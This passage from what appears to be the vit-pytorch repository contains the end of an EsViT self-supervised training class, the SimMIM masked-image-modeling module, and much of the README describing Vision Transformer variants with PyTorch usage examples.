0.9, center_moving_average_decay = 0.9, augment_fn = None, augment_fn2 = None ): super().__init__() self.net = net # default BYOL augmentation DEFAULT_AUG = torch.nn.Sequential( RandomApply( T.ColorJitter(0.8, 0.8, 0.8, 0.2), p = 0.3 ), T.RandomGrayscale(p=0.2), T.RandomHorizontalFlip(), RandomApply( T.GaussianBlur((3, 3), (1.0, 2.0)), p = 0.2 ), T.Normalize( mean=torch.tensor([0.485, 0.456, 0.406]), std=torch.tensor([0.229, 0.224, 0.225])), ) self.augment1 = default(augment_fn, DEFAULT_AUG) self.augment2 = default(augment_fn2, DEFAULT_AUG) # local and global crops self.local_crop = T.RandomResizedCrop((image_size, image_size), scale = (0.05, local_upper_crop_scale)) self.global_crop = T.RandomResizedCrop((image_size, image_size), scale = (global_lower_crop_scale, 1.)) self.student_encoder = NetWrapper(net, num_classes_K, projection_hidden_size, projection_layers, layer = hidden_layer) self.teacher_encoder = None self.teacher_ema_updater = EMA(moving_average_decay) self.register_buffer('teacher_view_centers', torch.zeros(1, num_classes_K)) self.register_buffer('last_teacher_view_centers', torch.zeros(1, num_classes_K)) self.register_buffer('teacher_region_centers', torch.zeros(1, num_classes_K)) self.register_buffer('last_teacher_region_centers', torch.zeros(1, num_classes_K)) self.teacher_centering_ema_updater = EMA(center_moving_average_decay) self.student_temp = student_temp self.teacher_temp = teacher_temp # get device of network and make wrapper same device device = get_module_device(net) self.to(device) # send a mock image tensor to instantiate singleton parameters self.forward(torch.randn(2, 3, image_size, image_size, device=device)) @singleton('teacher_encoder') def _get_teacher_encoder(self): teacher_encoder = copy.deepcopy(self.student_encoder) set_requires_grad(teacher_encoder, False) return teacher_encoder def reset_moving_average(self): del self.teacher_encoder self.teacher_encoder = None def update_moving_average(self): assert self.teacher_encoder is not None, 'target encoder has not been created yet' update_moving_average(self.teacher_ema_updater, self.teacher_encoder, self.student_encoder) new_teacher_view_centers = self.teacher_centering_ema_updater.update_average(self.teacher_view_centers, self.last_teacher_view_centers) self.teacher_view_centers.copy_(new_teacher_view_centers) new_teacher_region_centers = self.teacher_centering_ema_updater.update_average(self.teacher_region_centers, self.last_teacher_region_centers) self.teacher_region_centers.copy_(new_teacher_region_centers) def forward( self, x, return_embedding = False, return_projection = True, student_temp = None, teacher_temp = None ): if return_embedding: return self.student_encoder(x, return_projection = return_projection) image_one, image_two = self.augment1(x), self.augment2(x) local_image_one, local_image_two = self.local_crop(image_one), self.local_crop(image_two) global_image_one, global_image_two = self.global_crop(image_one), self.global_crop(image_two) student_view_proj_one, student_region_proj_one, student_latent_one = self.student_encoder(local_image_one) student_view_proj_two, student_region_proj_two, student_latent_two = self.student_encoder(local_image_two) with torch.no_grad(): teacher_encoder = self._get_teacher_encoder() teacher_view_proj_one, teacher_region_proj_one, teacher_latent_one = teacher_encoder(global_image_one) teacher_view_proj_two, teacher_region_proj_two, teacher_latent_two = teacher_encoder(global_image_two) view_loss_fn_ = partial( view_loss_fn, student_temp = default(student_temp, self.student_temp), teacher_temp = default(teacher_temp, self.teacher_temp), centers = self.teacher_view_centers ) region_loss_fn_ = partial( region_loss_fn, student_temp = default(student_temp, self.student_temp), teacher_temp = default(teacher_temp, self.teacher_temp), centers = self.teacher_region_centers ) # calculate view-level loss teacher_view_logits_avg = torch.cat((teacher_view_proj_one, teacher_view_proj_two)).mean(dim = 0) self.last_teacher_view_centers.copy_(teacher_view_logits_avg) teacher_region_logits_avg = torch.cat((teacher_region_proj_one, teacher_region_proj_two)).mean(dim = (0, 1)) self.last_teacher_region_centers.copy_(teacher_region_logits_avg) view_loss = (view_loss_fn_(teacher_view_proj_one, student_view_proj_two) \ + view_loss_fn_(teacher_view_proj_two, student_view_proj_one)) / 2 # calculate region-level loss region_loss = (region_loss_fn_(teacher_region_proj_one, student_region_proj_two, teacher_latent_one, student_latent_two) \ + region_loss_fn_(teacher_region_proj_two, student_region_proj_one, teacher_latent_two, student_latent_one)) / 2 return (view_loss + region_loss) / 2 File: vit_pytorch/simmim.py import torch from torch import nn import torch.nn.functional as F from einops import repeat class SimMIM(nn.Module): def __init__( self, *, encoder, masking_ratio = 0.5 ): super().__init__() assert masking_ratio > 0 and masking_ratio < 1, 'masking ratio must be kept between 0 and 1' self.masking_ratio = masking_ratio # extract some hyperparameters and functions from encoder (vision transformer to be trained) self.encoder = encoder num_patches, encoder_dim = encoder.pos_embedding.shape[-2:] self.to_patch = encoder.to_patch_embedding[0] self.patch_to_emb = nn.Sequential(*encoder.to_patch_embedding[1:]) pixel_values_per_patch = encoder.to_patch_embedding[2].weight.shape[-1] # simple linear head self.mask_token = nn.Parameter(torch.randn(encoder_dim)) self.to_pixels = nn.Linear(encoder_dim, pixel_values_per_patch) def forward(self, img): device = img.device # get patches patches = self.to_patch(img) batch, num_patches, *_ = patches.shape # for indexing purposes batch_range = torch.arange(batch, device = device)[:, None] # get positions pos_emb = self.encoder.pos_embedding[:, 1:(num_patches + 1)] # patch to encoder tokens and add positions tokens = self.patch_to_emb(patches) tokens = tokens + pos_emb # prepare mask tokens mask_tokens = repeat(self.mask_token, 'd -> b n d', b = batch, n = num_patches) mask_tokens = mask_tokens + pos_emb # calculate of patches needed to be masked, and get positions (indices) to be masked num_masked = int(self.masking_ratio * num_patches) masked_indices = torch.rand(batch, num_patches, device = device).topk(k = num_masked, dim = -1).indices masked_bool_mask = torch.zeros((batch, num_patches), device = device).scatter_(-1, masked_indices, 1).bool() # mask tokens tokens = torch.where(masked_bool_mask[..., None], mask_tokens, tokens) # attend with vision transformer encoded = self.encoder.transformer(tokens) # get the masked tokens encoded_mask_tokens = encoded[batch_range, masked_indices] # small linear projection for predicted pixel values pred_pixel_values = self.to_pixels(encoded_mask_tokens) # get the masked patches for the final reconstruction loss masked_patches = patches[batch_range, masked_indices] # calculate reconstruction loss recon_loss = F.l1_loss(pred_pixel_values, masked_patches) / num_masked return recon_loss
<img src="./images/vit.gif" width="500px"></img> ## Table of Contents - [Vision Transformer - Pytorch](#vision-transformer---pytorch) - [Install](#install) - [Usage](#usage) - [Parameters](#parameters) - [Simple ViT](#simple-vit) - [NaViT](#navit) - [Distillation](#distillation) - [Deep ViT](#deep-vit) - [CaiT](#cait) - [Token-to-Token ViT](#token-to-token-vit) - [CCT](#cct) - [Cross ViT](#cross-vit) - [PiT](#pit) - [LeViT](#levit) - [CvT](#cvt) - [Twins SVT](#twins-svt) - [CrossFormer](#crossformer) - [RegionViT](#regionvit) - [ScalableViT](#scalablevit) - [SepViT](#sepvit) - [MaxViT](#maxvit) - [NesT](#nest) - [MobileViT](#mobilevit) - [XCiT](#xcit) - [Masked Autoencoder](#masked-autoencoder) - [Simple Masked Image Modeling](#simple-masked-image-modeling) - [Masked Patch Prediction](#masked-patch-prediction) - [Masked Position Prediction](#masked-position-prediction) - [Adaptive Token Sampling](#adaptive-token-sampling) - [Patch Merger](#patch-merger) - [Vision Transformer for Small Datasets](#vision-transformer-for-small-datasets) - [3D Vit](#3d-vit) - [ViVit](#vivit) - [Parallel ViT](#parallel-vit) - [Learnable Memory ViT](#learnable-memory-vit) - [Dino](#dino) - [EsViT](#esvit) - [Accessing Attention](#accessing-attention) - [Research Ideas](#research-ideas) * [Efficient Attention](#efficient-attention) * [Combining with other Transformer improvements](#combining-with-other-transformer-improvements) - [FAQ](#faq) - [Resources](#resources) - [Citations](#citations) ## Vision Transformer - Pytorch Implementation of <a href="https://openreview.net/pdf?id=YicbFdNTTy">Vision Transformer</a>, a simple way to achieve SOTA in vision classification with only a single transformer encoder, in Pytorch. Significance is further explained in <a href="https://www.youtube.com/watch?v=TrdevFK_am4">Yannic Kilcher's</a> video. There's really not much to code here, but may as well lay it out for everyone so we expedite the attention revolution. For a Pytorch implementation with pretrained models, please see Ross Wightman's repository <a href="https://github.com/rwightman/pytorch-image-models">here</a>. The official Jax repository is <a href="https://github.com/google-research/vision_transformer">here</a>. A tensorflow2 translation also exists <a href="https://github.com/taki0112/vit-tensorflow">here</a>, created by research scientist <a href="https://github.com/taki0112">Junho Kim</a>! 🙏 <a href="https://github.com/conceptofmind/vit-flax">Flax translation</a> by <a href="https://github.com/conceptofmind">Enrico Shippole</a>! ## Install ```bash $ pip install vit-pytorch ``` ## Usage ```python import torch from vit_pytorch import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Parameters - `image_size`: int. Image size. If you have rectangular images, make sure your image size is the maximum of the width and height - `patch_size`: int. Size of patches. `image_size` must be divisible by `patch_size`. The number of patches is: ` n = (image_size // patch_size) ** 2` and `n` **must be greater than 16**. - `num_classes`: int. Number of classes to classify. - `dim`: int. Last dimension of output tensor after linear transformation `nn.Linear(..., dim)`. - `depth`: int. Number of Transformer blocks. - `heads`: int. Number of heads in Multi-head Attention layer. - `mlp_dim`: int. Dimension of the MLP (FeedForward) layer. - `channels`: int, default `3`. Number of image's channels. - `dropout`: float between `[0, 1]`, default `0.`. Dropout rate. - `emb_dropout`: float between `[0, 1]`, default `0`. Embedding dropout rate. - `pool`: string, either `cls` token pooling or `mean` pooling ## Simple ViT <a href="https://arxiv.org/abs/2205.01580">An update</a> from some of the same authors of the original paper proposes simplifications to `ViT` that allows it to train faster and better. Among these simplifications include 2d sinusoidal positional embedding, global average pooling (no CLS token), no dropout, batch sizes of 1024 rather than 4096, and use of RandAugment and MixUp augmentations. They also show that a simple linear at the end is not significantly worse than the original MLP head You can use it by importing the `SimpleViT` as shown below ```python import torch from vit_pytorch import SimpleViT v = SimpleViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## NaViT <img src="./images/navit.png" width="450px"></img> <a href="https://arxiv.org/abs/2307.06304">This paper</a> proposes to leverage the flexibility of attention and masking for variable lengthed sequences to train images of multiple resolution, packed into a single batch. They demonstrate much faster training and improved accuracies, with the only cost being extra complexity in the architecture and dataloading. They use factorized 2d positional encodings, token dropping, as well as query-key normalization. You can use it as follows ```python import torch from vit_pytorch.na_vit import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, token_dropout_prob = 0.1 # token dropout of 10% (keep 90% of tokens) ) # 5 images of different resolutions - List[List[Tensor]] # for now, you'll have to correctly place images in same batch element as to not exceed maximum allowed sequence length for self-attention w/ masking images = [ [torch.randn(3, 256, 256), torch.randn(3, 128, 128)], [torch.randn(3, 128, 256), torch.randn(3, 256, 128)], [torch.randn(3, 64, 256)] ] preds = v(images) # (5, 1000) - 5, because 5 images of different resolution above ``` Or if you would rather that the framework auto group the images into variable lengthed sequences that do not exceed a certain max length ```python images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v( images, group_images = True, group_max_seq_len = 64 ) # (5, 1000) ``` Finally, if you would like to make use of a flavor of NaViT using <a href="https://pytorch.org/tutorials/prototype/nestedtensor.html">nested tensors</a> (which will omit a lot of the masking and padding altogether), make sure you are on version `2.4` and import as follows ```python import torch from vit_pytorch.na_vit_nested_tensor import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 images of different resolutions - List[Tensor] images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v(images) assert preds.shape == (5, 1000) ``` ## Distillation <img src="./images/distill.png" width="300px"></img> A recent <a href="https://arxiv.org/abs/2012.12877">paper</a> has shown that use of a distillation token for distilling knowledge from convolutional nets to vision transformer can yield small and efficient vision transformers. This repository offers the means to do distillation easily. ex. distilling from Resnet50 (or any teacher) to a vision transformer ```python import torch from torchvision.models import resnet50 from vit_pytorch.distill import DistillableViT, DistillWrapper teacher = resnet50(pretrained = True) v = DistillableViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) distiller = DistillWrapper( student = v, teacher = teacher, temperature = 3, # temperature of distillation alpha = 0.5, # trade between main loss and distillation loss hard = False # whether to use soft or hard distillation ) img = torch.randn(2, 3, 256, 256) labels = torch.randint(0, 1000, (2,)) loss = distiller(img, labels) loss.backward() # after lots of training above ... pred = v(img) # (2, 1000) ``` The `DistillableViT` class is identical to `ViT` except for how the forward pass is handled, so you should be able to load the parameters back to `ViT` after you have completed distillation training. You can also use the handy `.to_vit` method on the `DistillableViT` instance to get back a `ViT` instance. ```python v = v.to_vit() type(v) # <class 'vit_pytorch.vit_pytorch.ViT'> ``` ## Deep ViT This <a href="https://arxiv.org/abs/2103.11886">paper</a> notes that ViT struggles to attend at greater depths (past 12 layers), and suggests mixing the attention of each head post-softmax as a solution, dubbed Re-attention. The results line up with the <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a> paper from NLP. You can use it as follows ```python import torch from vit_pytorch.deepvit import DeepViT v = DeepViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## CaiT <a href="https://arxiv.org/abs/2103.17239">This paper</a> also notes difficulty in training vision transformers at greater depths and proposes two solutions. First it proposes to do per-channel multiplication of the output of the residual block. Second, it proposes to have the patches attend to one another, and only allow the CLS token to attend to the patches in the last few layers. They also add <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a>, noting improvements You can use this scheme as follows ```python import torch from vit_pytorch.cait import CaiT v = CaiT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 12, # depth of transformer for patch to patch attention only cls_depth = 2, # depth of cross attention of CLS tokens to patch heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, layer_dropout = 0.05 # randomly dropout 5% of the layers ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Token-to-Token ViT <img src="./images/t2t.png" width="400px"></img> <a href="https://arxiv.org/abs/2101.11986">This paper</a> proposes that the first couple layers should downsample the image sequence by unfolding, leading to overlapping image data in each token as shown in the figure above. You can use this variant of the `ViT` as follows. ```python import torch from vit_pytorch.t2t import T2TViT v = T2TViT( dim = 512, image_size = 224, depth = 5, heads = 8, mlp_dim = 512, num_classes = 1000, t2t_layers = ((7, 4), (3, 2), (3, 2)) # tuples of the kernel size and stride of each consecutive layers of the initial token to token module ) img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## CCT <img src="https://raw.githubusercontent.com/SHI-Labs/Compact-Transformers/main/images/model_sym.png" width="400px"></img> <a href="https://arxiv.org/abs/2104.05704">CCT</a> proposes compact transformers by using convolutions instead of patching and performing sequence pooling. This allows for CCT to have high accuracy and a low number of parameters. You can use this with two methods ```python import torch from vit_pytorch.cct import CCT cct = CCT( img_size = (224, 448), embedding_dim = 384, n_conv_layers = 2, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_layers = 14, num_heads = 6, mlp_ratio = 3., num_classes = 1000, positional_embedding = 'learnable', # ['sine', 'learnable', 'none'] ) img = torch.randn(1, 3, 224, 448) pred = cct(img) # (1, 1000) ``` Alternatively you can use one of several pre-defined models `[2,4,6,7,8,14,16]` which pre-define the number of layers, number of attention heads, the mlp ratio, and the embedding dimension. ```python import torch from vit_pytorch.cct import cct_14 cct = cct_14( img_size = 224, n_conv_layers = 1, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_classes = 1000, positional_embedding = 'learnable', # ['sine', 'learnable', 'none'] ) ``` <a href="https://github.com/SHI-Labs/Compact-Transformers">Official Repository</a> includes links to pretrained model checkpoints. ## Cross ViT <img src="./images/cross_vit.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.14899">This paper</a> proposes to have two vision transformers processing the image at different scales, cross attending to one every so often. They show improvements on top of the base vision transformer. ```python import torch from vit_pytorch.cross_vit import CrossViT v = CrossViT( image_size = 256, num_classes = 1000, depth = 4, # number of multi-scale encoding blocks sm_dim = 192, # high res dimension sm_patch_size = 16, # high res patch size (should be smaller than lg_patch_size) sm_enc_depth = 2, # high res depth sm_enc_heads = 8, # high res heads sm_enc_mlp_dim = 2048, # high res feedforward dimension lg_dim = 384, # low res dimension lg_patch_size = 64, # low res patch size lg_enc_depth = 3, # low res depth lg_enc_heads = 8, # low res heads lg_enc_mlp_dim = 2048, # low res feedforward dimensions cross_attn_depth = 2, # cross attention rounds cross_attn_heads = 8, # cross attention heads dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) pred = v(img) # (1, 1000) ``` ## PiT <img src="./images/pit.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.16302">This paper</a> proposes to downsample the tokens through a pooling procedure using depth-wise convolutions. ```python import torch from vit_pytorch.pit import PiT v = PiT( image_size = 224, patch_size = 14, dim = 256, num_classes = 1000, depth = (3, 3, 3), # list of depths, indicating the number of rounds of each stage before a downsample heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## LeViT <img src="./images/levit.png" width="300px"></img> <a href="https://arxiv.org/abs/2104.01136">This paper</a> proposes a number of changes, including (1) convolutional embedding instead of patch-wise projection (2) downsampling in stages (3) extra non-linearity in attention (4) 2d relative positional biases instead of initial absolute positional bias (5) batchnorm in place of layernorm. <a href="https://github.com/facebookresearch/LeViT">Official repository</a> ```python import torch from vit_pytorch.levit import LeViT levit = LeViT( image_size = 224, num_classes = 1000, stages = 3, # number of stages dim = (256, 384, 512), # dimensions at each stage depth = 4, # transformer of depth 4 at each stage heads = (4, 6, 8), # heads at each stage mlp_mult = 2, dropout = 0.1 ) img = torch.randn(1, 3, 224, 224) levit(img) # (1, 1000) ``` ## CvT <img src="./images/cvt.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.15808">This paper</a> proposes mixing convolutions and attention. Specifically, convolutions are used to embed and downsample the image / feature map in three stages. Depthwise-convoltion is also used to project the queries, keys, and values for attention. ```python import torch from vit_pytorch.cvt import CvT v = CvT( num_classes = 1000, s1_emb_dim = 64, # stage 1 - dimension s1_emb_kernel = 7, # stage 1 - conv kernel s1_emb_stride = 4, # stage 1 - conv stride s1_proj_kernel = 3, # stage 1 - attention ds-conv kernel size s1_kv_proj_stride = 2, # stage 1 - attention key / value projection stride s1_heads = 1, # stage 1 - heads s1_depth = 1, # stage 1 - depth s1_mlp_mult = 4, # stage 1 - feedforward expansion factor s2_emb_dim = 192, # stage 2 - (same as above) s2_emb_kernel = 3, s2_emb_stride = 2, s2_proj_kernel = 3, s2_kv_proj_stride = 2, s2_heads = 3, s2_depth = 2, s2_mlp_mult = 4, s3_emb_dim = 384, # stage 3 - (same as above) s3_emb_kernel = 3, s3_emb_stride = 2, s3_proj_kernel = 3, s3_kv_proj_stride = 2, s3_heads = 4, s3_depth = 10, s3_mlp_mult = 4, dropout = 0. ) img = torch.randn(1, 3, 224, 224) pred = v(img) # (1, 1000) ``` ## Twins SVT <img src="./images/twins_svt.png" width="400px"></img> This <a href="https://arxiv.org/abs/2104.13840">paper</a> proposes mixing local and global attention, along with position encoding generator (proposed in <a href="https://arxiv.org/abs/2102.10882">CPVT</a>) and global average pooling, to achieve the same results as <a href="https://arxiv.org/abs/2103.14030">Swin</a>, without the extra complexity of shifted windows, CLS tokens, nor positional embeddings. ```python import torch from vit_pytorch.twins_svt import TwinsSVT model = TwinsSVT( num_classes = 1000, # number of output classes s1_emb_dim = 64, # stage 1 - patch embedding projected dimension s1_patch_size = 4, # stage 1 - patch size for patch embedding s1_local_patch_size = 7, # stage 1 - patch size for local attention s1_global_k = 7, # stage 1 - global attention key / value reduction factor, defaults to 7 as specified in paper s1_depth = 1, # stage 1 - number of transformer blocks (local attn -> ff -> global attn -> ff) s2_emb_dim = 128, # stage 2 (same as above) s2_patch_size = 2, s2_local_patch_size = 7, s2_global_k = 7, s2_depth = 1, s3_emb_dim = 256, # stage 3 (same as above) s3_patch_size = 2, s3_local_patch_size = 7, s3_global_k = 7, s3_depth = 5, s4_emb_dim = 512, # stage 4 (same as above) s4_patch_size = 2, s4_local_patch_size = 7, s4_global_k = 7, s4_depth = 4, peg_kernel_size = 3, # positional encoding generator kernel size dropout = 0. # dropout ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## RegionViT <img src="./images/regionvit.png" width="400px"></img> <img src="./images/regionvit2.png" width="400px"></img> <a href="https://arxiv.org/abs/2106.02689">This paper</a> proposes to divide up the feature map into local regions, whereby the local tokens attend to each other. Each local region has its own regional token which then attends to all its local tokens, as well as other regional tokens. You can use it as follows ```python import torch from vit_pytorch.regionvit import RegionViT model = RegionViT( dim = (64, 128, 256, 512), # tuple of size 4, indicating dimension at each stage depth = (2, 2, 8, 2), # depth of the region to local transformer at each stage window_size = 7, # window size, which should be either 7 or 14 num_classes = 1000, # number of output classes tokenize_local_3_conv = False, # whether to use a 3 layer convolution to encode the local tokens from the image. the paper uses this for the smaller models, but uses only 1 conv (set to False) for the larger models use_peg = False, # whether to use positional generating module. they used this for object detection for a boost in performance ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## CrossFormer <img src="./images/crossformer.png" width="400px"></img> <img src="./images/crossformer2.png" width="400px"></img> This <a href="https://arxiv.org/abs/2108.00154">paper</a> beats PVT and Swin using alternating local and global attention. The global attention is done across the windowing dimension for reduced complexity, much like the scheme used for axial attention. They also have cross-scale embedding layer, which they shown to be a generic layer that can improve all vision transformers. Dynamic relative positional bias was also formulated to allow the net to generalize to images of greater resolution. ```python import torch from vit_pytorch.crossformer import CrossFormer model = CrossFormer( num_classes = 1000, # number of output classes dim = (64, 128, 256, 512), # dimension at each stage depth = (2, 2, 8, 2), # depth of transformer at each stage global_window_size = (8, 4, 2, 1), # global window sizes at each stage local_window_size = 7, # local window size (can be customized for each stage, but in paper, held constant at 7 for all stages) ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## ScalableViT <img src="./images/scalable-vit-1.png" width="400px"></img> <img src="./images/scalable-vit-2.png" width="400px"></img> This Bytedance AI <a href="https://arxiv.org/abs/2203.10790">paper</a> proposes the Scalable Self Attention (SSA) and the Interactive Windowed Self Attention (IWSA) modules. The SSA alleviates the computation needed at earlier stages by reducing the key / value feature map by some factor (`reduction_factor`), while modulating the dimension of the queries and keys (`ssa_dim_key`). The IWSA performs self attention within local windows, similar to other vision transformer papers. However, they add a residual of the values, passed through a convolution of kernel size 3, which they named Local Interactive Module (LIM). They make the claim in this paper that this scheme outperforms Swin Transformer, and also demonstrate competitive performance against Crossformer. You can use it as follows (ex. ScalableViT-S) ```python import torch from vit_pytorch.scalable_vit import ScalableViT model = ScalableViT( num_classes = 1000, dim = 64, # starting model dimension. at every stage, dimension is doubled heads = (2, 4, 8, 16), # number of attention heads at each stage depth = (2, 2, 20, 2), # number of transformer blocks at each stage ssa_dim_key = (40, 40, 40, 32), # the dimension of the attention keys (and queries) for SSA. in the paper, they represented this as a scale factor on the base dimension per key (ssa_dim_key / dim_key) reduction_factor = (8, 4, 2, 1), # downsampling of the key / values in SSA. in the paper, this was represented as (reduction_factor ** -2) window_size = (64, 32, None, None), # window size of the IWSA at each stage. None means no windowing needed dropout = 0.1, # attention and feedforward dropout ) img = torch.randn(1, 3, 256, 256) preds = model(img) # (1, 1000) ``` ## SepViT <img src="./images/sep-vit.png" width="400px"></img> Another <a href="https://arxiv.org/abs/2203.15380">Bytedance AI paper</a>, it proposes a depthwise-pointwise self-attention layer that seems largely inspired by mobilenet's depthwise-separable convolution. The most interesting aspect is the reuse of the feature map from the depthwise self-attention stage as the values for the pointwise self-attention, as shown in the diagram above. I have decided to include only the version of `SepViT` with this specific self-attention layer, as the grouped attention layers are not remarkable nor novel, and the authors were not clear on how they treated the window tokens for the group self-attention layer. Besides, it seems like with `DSSA` layer alone, they were able to beat Swin. ex. SepViT-Lite ```python import torch from vit_pytorch.sep_vit import SepViT v = SepViT( num_classes = 1000, dim = 32, # dimensions of first stage, which doubles every stage (32, 64, 128, 256) for SepViT-Lite dim_head = 32, # attention head dimension heads = (1, 2, 4, 8), # number of heads per stage depth = (1, 2, 6, 2), # number of transformer blocks per stage window_size = 7, # window size of DSS Attention block dropout = 0.1 # dropout ) img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## MaxViT <img src="./images/max-vit.png" width="400px"></img> <a href="https://arxiv.org/abs/2204.01697">This paper</a> proposes a hybrid convolutional / attention network, using MBConv from the convolution side, and then block / grid axial sparse attention. They also claim this specific vision transformer is good for generative models (GANs). ex. MaxViT-S ```python import torch from vit_pytorch.max_vit import MaxViT v = MaxViT( num_classes = 1000, dim_conv_stem = 64, # dimension of the convolutional stem, would default to dimension of first layer if not specified dim = 96, # dimension of first layer, doubles every layer dim_head = 32, # dimension of attention heads, kept at 32 in paper depth = (2, 2, 5, 2), # number of MaxViT blocks per stage, which consists of MBConv, block-like attention, grid-like attention window_size = 7, # window size for block and grids mbconv_expansion_rate = 4, # expansion rate of MBConv mbconv_shrinkage_rate = 0.25, # shrinkage rate of squeeze-excitation in MBConv dropout = 0.1 # dropout ) img = torch.randn(2, 3, 224, 224) preds = v(img) # (2, 1000) ``` ## NesT <img src="./images/nest.png" width="400px"></img> This <a href="https://arxiv.org/abs/2105.12723">paper</a> decided to process the image in hierarchical stages, with attention only within tokens of local blocks, which aggregate as it moves up the hierarchy. The aggregation is done in the image plane, and contains a convolution and subsequent maxpool to allow it to pass information across the boundary. You can use it with the following code (ex. NesT-T) ```python import torch from vit_pytorch.nest import NesT nest = NesT( image_size = 224, patch_size = 4, dim = 96, heads = 3, num_hierarchies = 3, # number of hierarchies block_repeats = (2, 2, 8), # the number of transformer blocks at each hierarchy, starting from the bottom num_classes = 1000 ) img = torch.randn(1, 3, 224, 224) pred = nest(img) # (1, 1000) ``` ## MobileViT <img src="./images/mbvit.png" width="400px"></img> This <a href="https://arxiv.org/abs/2110.02178">paper</a> introduce MobileViT, a light-weight and general purpose vision transformer for mobile devices. MobileViT presents a different perspective for the global processing of information with transformers. You can use it with the following code (ex. mobilevit_xs) ```python import torch from vit_pytorch.mobile_vit import MobileViT mbvit_xs = MobileViT( image_size = (256, 256), dims = [96, 120, 144], channels = [16, 32, 48, 48, 64, 64, 80, 80, 96, 96, 384], num_classes = 1000 ) img = torch.randn(1, 3, 256, 256) pred = mbvit_xs(img) # (1, 1000) ``` ## XCiT <img src="./images/xcit.png" width="400px"></img> This <a href="https://arxiv.org/abs/2106.09681">paper</a> introduces the cross covariance attention (abbreviated XCA). One can think of it as doing attention across the features dimension rather than the spatial one (another perspective would be a dynamic 1x1 convolution, the kernel being attention map defined by spatial correlations). Technically, this amounts to simply transposing the query, key, values before executing cosine similarity attention with learned temperature. ```python import torch from vit_pytorch.xcit import XCiT v = XCiT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 12, # depth of xcit transformer cls_depth = 2, # depth of cross attention of CLS tokens to patch, attention pool at end heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, layer_dropout = 0.05, # randomly dropout 5% of the layers local_patch_kernel_size = 3 # kernel size of the local patch interaction module (depthwise convs) ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Simple Masked Image Modeling <img src="./images/simmim.png" width="400px"/> This <a href="https://arxiv.org/abs/2111.09886">paper</a> proposes a simple masked image modeling (SimMIM) scheme, using only a linear projection off the masked tokens into pixel space followed by an L1 loss with the pixel values of the masked patches. Results are competitive with other more complicated approaches. You can use this as follows ```python import torch from vit_pytorch import ViT from vit_pytorch.simmim import SimMIM v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) mim = SimMIM( encoder = v, masking_ratio = 0.5 # they found 50% to yield the best results ) images = torch.randn(8, 3, 256, 256) loss = mim(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn torch.save(v.state_dict(), './trained-vit.pt') ``` ## Masked Autoencoder <img src="./images/mae.png" width="400px"/> A new <a href="https://arxiv.org/abs/2111.06377">Kaiming He paper</a> proposes a simple autoencoder scheme where the vision transformer attends to a set of unmasked patches, and a smaller decoder tries to reconstruct the masked pixel values. <a href="https://www.youtube.com/watch?v=LKixq2S2Pz8">DeepReader quick paper review</a> <a href="https://www.youtube.com/watch?v=Dp6iICL2dVI">AI Coffeebreak with Letitia</a> You can use it with the following code ```python import torch from vit_pytorch import ViT, MAE v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) mae = MAE( encoder = v, masking_ratio = 0.75, # the paper recommended 75% masked patches decoder_dim = 512, # paper showed good results with just 512 decoder_depth = 6 # anywhere from 1 to 8 ) images = torch.randn(8, 3, 256, 256) loss = mae(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn # save your improved vision transformer torch.save(v.state_dict(), './trained-vit.pt') ``` ## Masked Patch Prediction Thanks to <a 